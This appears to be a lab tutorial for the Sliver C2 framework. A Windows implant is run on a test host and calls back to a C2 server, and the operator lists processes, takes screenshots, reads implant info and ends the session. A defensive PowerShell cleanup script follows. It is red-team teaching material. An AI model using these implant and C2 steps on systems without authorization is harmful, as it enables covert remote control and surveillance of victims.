Run a Windows Session

Deploy the Windows session implant to the target host, and run it:

PS C:\Users\steve\Downloads> .\winsession.exe

Once the implant has been executed, go back to the Sliver Client and run the sessions command to see if the implant has communicated back to the server:

sliver > sessions

ID         Transport   Remote Address        Hostname    Username   Operating System   Health
========== =========== ===================== =========== ========== ================== =========
a6402bf1   http(s)     192.168.0.117:53241   WinLaptop   steve      windows/amd64      [ALIVE]

We can now see that the implant was executed, communicated back to the Sliver Server, and it is "ALIVE". Next, run the use <ID> command to start interacting with the target host.

sliver > use a6402bf1

[*] Active session winsession (a6402bf1-7d62-43f0-9355-bca32edb3c9f)

sliver (winsession) >

(Note: if you press the Tab key after the UUID of the session, it will present the full string. This isn't necessary, but it is there if you want it.)

Once you run the use command, the Sliver command prompt changes to include the name of the session.

Running the ps command lists the processes on the target host:

sliver (winsession) > ps

Pid     Ppid    Owner             Arch     Executable                        Session
======= ======= ================= ======== ================================= =========
0       0                                  [System Process]                  -1
4       0                                  System                            -1
108     4                                  Secure System                     -1
144     4                                  Registry                          -1
644     4                                  smss.exe                          -1

Through the implant, we can take a screenshot of the Windows target host. The screenshot is saved on the client that executed the screenshot command.

sliver (winsession) > screenshot

[*] Screenshot written to /tmp/screenshot_WinLaptop_20241003140646_2578315628.png (148.6 KiB)

sliver (winsession) >

Additionally, you can display information about the current implant by running the info command:

sliver (winsession) > info

Session ID: a6402bf1-7d62-43f0-9355-bca32edb3c9f
Name: winsession
Hostname: WinLaptop
UUID: 4c4c4544-004b-4310-805a-b2c04f4e5333
Username: WinLaptop\steve
UID: S-1-5-21-192289400-3165233833-1525390679-1001
GID: S-1-5-21-192289400-3165233833-1525390679-513
PID: 8836
OS: windows
Version: 10 build 22631 x86_64
Locale: en-US
Arch: amd64
Active C2: https://192.168.0.120
Remote Address: 192.168.0.117:53241
Proxy URL:
Reconnect Interval: 1m0s
First Contact: Thu Oct 3 14:00:25 EDT 2024 (13m50s ago)
Last Checkin: Thu Oct 3 14:14:13 EDT 2024 (2s ago)

Once you are finished with the implant, you can kill the process on the target host, or you can just kill the session in Sliver. Keep in mind that the executable will still be on the target host.

sliver (winsession) > sessions

ID         Transport   Remote Address        Hostname    Username   Operating System   Health
========== =========== ===================== =========== ========== ================== =========
a6402bf1   http(s)     192.168.0.117:53241   WinLaptop   steve      windows/amd64      [ALIVE]

sliver (winsession) > sessions -k a6402bf1

[!] Lost session a6402bf1 winsession - 192.168.0.117:53241 (WinLaptop) - windows/amd64 - Thu, 03 Oct 2024 14:20:02 EDT

sliver > sessions

[*] No sessions 🙁

sliver >
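
Because the executable stays on the target host after the session is killed, a cleanup check on the Windows host is useful at this point. The following PowerShell is an added example, not part of the original walkthrough or of Sliver; the file path and C2 address are taken from the output above, and the function name Get-ImplantResidue is hypothetical.

```powershell
# Added example: post-session cleanup check, run on the target host.
# Values come from the session output on this page; adjust them for your lab.
$ImplantPath = 'C:\Users\steve\Downloads\winsession.exe'
$C2Address   = '192.168.0.120'   # "Active C2" from the info output

# Hypothetical helper: reports what the implant left behind on this host.
function Get-ImplantResidue {
    param(
        [Parameter(Mandatory)] [string]$Path,
        [Parameter(Mandatory)] [string]$RemoteAddress
    )

    $name = [System.IO.Path]::GetFileNameWithoutExtension($Path)

    # Any process still running from the implant path
    $procs = @(Get-Process -Name $name -ErrorAction SilentlyContinue |
        Where-Object { $_.Path -eq $Path })

    # Any TCP connection still associated with the C2 address
    $conns = @(Get-NetTCPConnection -RemoteAddress $RemoteAddress -ErrorAction SilentlyContinue)

    # The executable itself, with a hash for the engagement report
    $file = Get-Item -LiteralPath $Path -ErrorAction SilentlyContinue
    $hash = if ($file) { (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash } else { $null }

    [pscustomobject]@{
        ProcessIds  = $procs.Id
        Connections = $conns | Select-Object LocalPort, RemotePort, State, OwningProcess
        FileOnDisk  = [bool]$file
        Sha256      = $hash
    }
}

$residue = Get-ImplantResidue -Path $ImplantPath -RemoteAddress $C2Address
$residue | Format-List

# Delete the file only when nothing is still running from it; -Confirm prompts first.
if ($residue.FileOnDisk -and -not $residue.ProcessIds) {
    Remove-Item -LiteralPath $ImplantPath -Confirm
}
```

Record the SHA-256 value before removing the file so the artifact can be matched against endpoint and proxy logs later.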